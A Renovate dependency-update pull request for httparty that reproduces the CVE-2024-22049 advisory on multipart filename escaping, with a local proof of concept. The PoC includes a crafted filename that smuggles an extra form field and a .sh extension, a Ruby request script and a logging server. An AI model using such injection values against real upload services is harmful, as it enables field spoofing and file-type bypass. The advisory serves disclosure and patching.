chore(deps): update dependency httparty to v0.21.0 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
httparty	0.18.1 -> 0.21.0

GitHub Vulnerability Alerts

CVE-2024-22049

Impact

I found "multipart/form-data request tampering vulnerability" caused by Content-Disposition "filename" lack of escaping in httparty.

httparty/lib/httparty/request > body.rb > def generate_multipart

https://github.com/jnunemaker/httparty/blob/4416141d37fd71bdba4f37589ec265f55aa446ce/lib/httparty/request/body.rb#L43

By exploiting this problem, the following attacks are possible

• An attack that rewrites the "name" field according to the crafted file name, impersonating (overwriting) another field.
• Attacks that rewrite the filename extension at the time multipart/form-data is generated by tampering with the filename

For example, this vulnerability can be exploited to generate the following Content-Disposition.

Normal Request example:
normal input filename: abc.txt

generated normal header in multipart/form-data
Content-Disposition: form-data; name="avatar"; filename="abc.txt"

Malicious Request example
malicious input filename: overwrite_name_field_and_extension.sh"; name="foo"; dummy=".txt

generated malicious header in multipart/form-data:
Content-Disposition: form-data; name="avatar"; filename="overwrite_name_field_and_extension.sh"; name="foo"; dummy=".txt"

The Abused Header has multiple name ( avatar & foo ) fields and the "filename" has been rewritten from *.txt to *.sh .

These problems can result in successful or unsuccessful attacks, depending on the behavior of the parser receiving the request.
I have confirmed that the attack succeeds, at least in the following frameworks

• Spring (Java)
• Ktor (Kotlin)
• Ruby on Rails (Ruby)

The cause of this problem is the lack of escaping of the " (Double-Quote) character in Content-Disposition > filename.

WhatWG's HTML spec has an escaping requirement.

https://html.spec.whatwg.org/#multipart-form-data

For field names and filenames for file fields, the result of the encoding in the previous bullet point must be escaped by replacing any 0x0A (LF) bytes with the byte sequence %0A, 0x0D (CR) with %0D and 0x22 (") with %22. The user agent must not perform any other escapes.

Patches

As noted at the beginning of this section, encoding must be done as described in the HTML Spec.

https://html.spec.whatwg.org/#multipart-form-data

For field names and filenames for file fields, the result of the encoding in the previous bullet point must be escaped by replacing any 0x0A (LF) bytes with the byte sequence %0A, 0x0D (CR) with %0D and 0x22 (") with %22. The user agent must not perform any other escapes.

Therefore, it is recommended that Content-Disposition be modified by either of the following

Before:
Content-Disposition: attachment;filename="malicious.sh";dummy=.txt

After:
Content-Disposition: attachment;filename="%22malicious.sh%22;dummy=.txt"

https://github.com/jnunemaker/httparty/blob/4416141d37fd71bdba4f37589ec265f55aa446ce/lib/httparty/request/body.rb#L43

file_name.gsub('"', '%22')

Also, as for \r, \n, URL Encode is not done, but it is not newlines, so it seemed to be OK.
However, since there may be omissions, it is safer to URL encode these as well, if possible.
( \r to %0A and \d to %0D )

PoC

PoC Environment

OS: macOS Monterey(12.3)
Ruby ver: ruby 3.1.2p20
httparty ver: 0.20.0
(Python3 - HTTP Request Logging Server)

PoC procedure

(Linux or MacOS is required.
This is because Windows does not allow file names containing " (double-quote) .)

1. Create Project

$ mkdir my-app
$ cd my-app
$ gem install httparty

2. Create malicious file

$ touch 'overwrite_name_field_and_extension.sh"; name="foo"; dummy=".txt'

3. Generate Vuln code

$ vi example.rb

require 'httparty'

filename = 'overwrite_name_field_and_extension.sh"; name="foo"; dummy=".txt'

HTTParty.post('http://localhost:12345/',
  body: {
    name: 'Foo Bar',
    email: '[email protected]',
    avatar: File.open(filename)
  }
)

4. Run Logging Server

I write Python code, but any method will work as long as you can see the HTTP Request Body.
(e.g. Debugger, HTTP Logging Server, Packet Capture)

$ vi logging.py

from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler

class LoggingServer(BaseHTTPRequestHandler):

    def do_POST(self):
        self.send_response(200)
        self.end_headers()
        self.wfile.write("ok".encode("utf-8"))

        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        print("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n",
                     str(self.path), str(self.headers), post_data.decode('utf-8'))
        self.wfile.write("POST request for {}".format(self.path).encode('utf-8'))

ip = '127.0.0.1'
port = 12345

server = HTTPServer((ip, port), LoggingServer)
server.serve_forever()

$ python logging.py

5. Run & Logging server

$ run example.rb

Return Request Header & Body:

User-Agent: Ruby
Content-Type: multipart/form-data; boundary=------------------------F857UcxRc2J1zFOz
Connection: close
Host: localhost:12345
Content-Length: 457

--------------------------F857UcxRc2J1zFOz
Content-Disposition: form-data; name="name"

Foo Bar
--------------------------F857UcxRc2J1zFOz
Content-Disposition: form-data; name="email"

[email protected]
--------------------------F857UcxRc2J1zFOz
Content-Disposition: form-data; name="avatar"; filename="overwrite_name_field_and_extension.sh"; name="foo"; dummy=".txt"
Content-Type: text/plain

abc
--------------------------F857UcxRc2J1zFOz--

Content-Disposition:

Content-Disposition: form-data; name="avatar"; filename="overwrite_name_field_and_extension.sh"; name="foo"; dummy=".txt"

• name fields is duplicate (avator & foo)
• filename & extension tampering ( .txt --> .sh )

References

1. I also include a similar report that I previously reported to Firefox.
   https://bugzilla.mozilla.org/show_bug.cgi?id=1556711

2. I will post some examples of frameworks that did not have problems as reference.

Golang
https://github.com/golang/go/blob/e0e0c8fe9881bbbfe689ad94ca5dddbb252e4233/src/mime/multipart/writer.go#L144

Spring
https://github.com/spring-projects/spring-framework/blob/4cc91e46b210b4e4e7ed182f93994511391b54ed/spring-web/src/main/java/org/springframework/http/ContentDisposition.java#L259-L267

Symphony
https://github.com/symfony/symfony/blob/123b1651c4a7e219ba59074441badfac65525efe/src/Symfony/Component/Mime/Header/ParameterizedHeader.php#L128-L133

For more information

If you have any questions or comments about this advisory:

• Email us at [email protected]

---

Release Notes

jnunemaker/httparty (httparty)

v0.21.0

Compare Source

• escape filename in the multipart/form-data Content-Disposition header
• Fix request marshaling
• Replace mime-types with mini_mime

v0.20.0

Compare Source

Breaking changes

• Require Ruby >= 2.3.0

Fixes

• Marshal.dump fails on response objects when request option :logger is set or :parser is a proc
• Switch :pem option to to OpenSSL::PKey.read to support other algorithms

v0.19.1

Compare Source

• Remove use of unary + method for creating non-frozen string to increase compatibility with older versions of ruby

v0.19.0

Compare Source

• Multipart/Form-Data: rewind files after read
• add frozen_string_literal pragma to all files
• Better handling of Accept-Encoding / Content-Encoding decompression (fixes #​562)

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: Gemfile.lock

[20:46:59.589] INFO (949): Installing tool [email protected]...
installing v2 tool ruby v2.7.2
Download failed: https://github.com/containerbase/ruby-prebuild/releases/download/2.7.2/ruby-2.7.2-jammy-x86_64.tar.xz
Download failed, retrying
Download failed: https://github.com/containerbase/ruby-prebuild/releases/download/2.7.2/ruby-2.7.2-jammy-x86_64.tar.xz
Download failed, retrying
Download failed: https://github.com/containerbase/ruby-prebuild/releases/download/2.7.2/ruby-2.7.2-jammy-x86_64.tar.xz
Download failed: https://github.com/containerbase/ruby-prebuild/releases/download/2.7.2/ruby-2.7.2-jammy-x86_64.tar.xz
[20:47:01.357] INFO (1017): Downloading file ...
    url: "https://github.com/containerbase/ruby-prebuild/releases/download/2.7.2/ruby-2.7.2-jammy-x86_64.tar.xz"
    output: "/tmp/renovate/cache/containerbase/781d686dfa47f7cdec253914c03d5fd4a714db792c257c27ecb66e36b097a157/ruby-2.7.2-jammy-x86_64.tar.xz"
[20:47:01.460] ERROR (1017): Response code 404 (Not Found)
[20:47:01.461] FATAL (1017): Download failed in 104ms.
[20:47:01.552] ERROR (949): Command failed with exit code 1: /usr/local/containerbase/bin/install-tool.sh ruby 2.7.2
[20:47:01.553] FATAL (949): Install tool ruby failed in 1.9s.